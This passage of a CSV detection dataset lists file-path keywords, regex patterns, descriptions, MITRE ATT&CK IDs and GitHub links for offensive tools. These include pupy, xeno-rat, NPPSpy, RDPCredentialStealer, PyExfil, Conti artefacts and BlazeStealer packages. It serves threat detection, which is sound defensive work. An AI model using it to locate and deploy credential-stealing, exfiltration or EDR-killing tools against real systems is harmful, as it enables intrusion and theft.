Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*\Privesc-master*",".{0,1000}\\Privesc\-master.{0,1000}","offensive_tool_keyword","Privesc","Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation","T1068 - T1548 - T1082 - T1078","TA0004","N/A","N/A","Privilege Escalation","https://github.com/enjoiz/Privesc","1","0","N/A","10","5","469","90","2023-03-06T10:27:00Z","2015-11-19T13:22:01Z" "*\privexchange.py*",".{0,1000}\\privexchange\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\PrivKit\*",".{0,1000}\\PrivKit\\.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*\procdump.py*",".{0,1000}\\procdump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\process_killer.cpp*",".{0,1000}\\process_killer\.cpp.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","N/A","10","4","345","63","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*\ProcessDLLHijack.cs*",".{0,1000}\\ProcessDLLHijack\.cs.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*\processinjection.exe*",".{0,1000}\\processinjection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\ProcessSpoofing.h*",".{0,1000}\\ProcessSpoofing\.h.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*\ProcProtectClient.exe*",".{0,1000}\\ProcProtectClient\.exe.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*\ProduKey.exe*",".{0,1000}\\ProduKey\.exe.{0,1000}","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\Program Files (x86)\KidLogger*",".{0,1000}\\Program\sFiles\s\(x86\)\\KidLogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\ProgramData\asrephashes.txt*",".{0,1000}\\ProgramData\\asrephashes\.txt.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\ProgramData\shares.txt*",".{0,1000}\\ProgramData\\shares\.txt.{0,1000}","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*\Programs\StartUp\XenoUpdateManager*",".{0,1000}\\Programs\\StartUp\\XenoUpdateManager.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*\ps2exe.ps1*",".{0,1000}\\ps2exe\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*\PS2EXE\*.ps1*",".{0,1000}\\PS2EXE\\.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*\PsExecLog.log*",".{0,1000}\\PsExecLog\.log.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","620","139","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" "*\PSexecutionPolicy.bat*",".{0,1000}\\PSexecutionPolicy\.bat.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\psgetsys.ps1*",".{0,1000}\\psgetsys\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\psgetsys.ps1*",".{0,1000}\\psgetsys\.ps1.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","0","N/A","10","4","320","83","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z" "*\psgetsys.ps1*",".{0,1000}\\psgetsys\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\PSLessExec.exe*",".{0,1000}\\PSLessExec\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*\pspasswd.exe*",".{0,1000}\\pspasswd\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\pspasswd64.exe*",".{0,1000}\\pspasswd64\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\PSprofile.exe*",".{0,1000}\\PSprofile\.exe.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","10","1","83","21","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" "*\PSPY.dll*",".{0,1000}\\PSPY\.dll.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*\PSPY.exe*",".{0,1000}\\PSPY\.exe.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*\pspy\pspy.go*",".{0,1000}\\pspy\\pspy\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*\PSRansom -*",".{0,1000}\\PSRansom\s\-.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","5","440","106","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z" "*\psscanner\psscanner.go*",".{0,1000}\\psscanner\\psscanner\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*\Public\chop.enc*",".{0,1000}\\Public\\chop\.enc.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*\Public\dcapi.dll*",".{0,1000}\\Public\\dcapi\.dll.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*\public\klogging.log*",".{0,1000}\\public\\klogging\.log.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","10","1","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z" "*\Public\Music\RDPCreds.txt*",".{0,1000}\\Public\\Music\\RDPCreds\.txt.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","N/A","10","3","222","35","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*\pupwinutils\*",".{0,1000}\\pupwinutils\\.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*\pupy\external\creddump7*",".{0,1000}\\pupy\\external\\creddump7.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*\pupyx64.exe*",".{0,1000}\\pupyx64\.exe.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*\pupyx86.exe*",".{0,1000}\\pupyx86\.exe.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*\PurpleSharp.exe*",".{0,1000}\\PurpleSharp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\pwn.exe*",".{0,1000}\\pwn\.exe.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\pwned.txt*",".{0,1000}\\pwned\.txt.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" "*\pxlib\bin\wmiexec.x86.o*",".{0,1000}\\pxlib\\bin\\wmiexec\.x86\.o.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\PyClone.py*",".{0,1000}\\PyClone\.py.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*\PyExfil\pyexfil\*",".{0,1000}\\PyExfil\\pyexfil\\.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*\Pyobfadvance*",".{0,1000}\\Pyobfadvance.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*\Pyobfexecute*",".{0,1000}\\Pyobfexecute.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*\pyobfgood*",".{0,1000}\\pyobfgood.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*\Pyobflite*",".{0,1000}\\Pyobflite.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*\Pyobfpremium*",".{0,1000}\\Pyobfpremium.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*\Pyobftoexe*",".{0,1000}\\Pyobftoexe.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*\Pyobfuse*",".{0,1000}\\Pyobfuse.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*\Pyobfusfile*",".{0,1000}\\Pyobfusfile.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*\pyramid.py*",".{0,1000}\\pyramid\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\pyrdp_plugin.py*",".{0,1000}\\pyrdp_plugin\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*\pysecdump.exe*",".{0,1000}\\pysecdump\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\pysnaffler\pysnaffler\*",".{0,1000}\\pysnaffler\\pysnaffler\\.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*\pysoxy.py*",".{0,1000}\\pysoxy\.py.{0,1000}","offensive_tool_keyword","pysoxy","A small Socks5 Proxy Server in Python","T1090","TA0011","N/A","N/A","C2","https://github.com/MisterDaneel/pysoxy","1","0","N/A","10","10","118","47","2023-10-15T06:12:45Z","2016-04-21T07:56:24Z" "*\Python-Rootkit\*",".{0,1000}\\Python\-Rootkit\\.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" 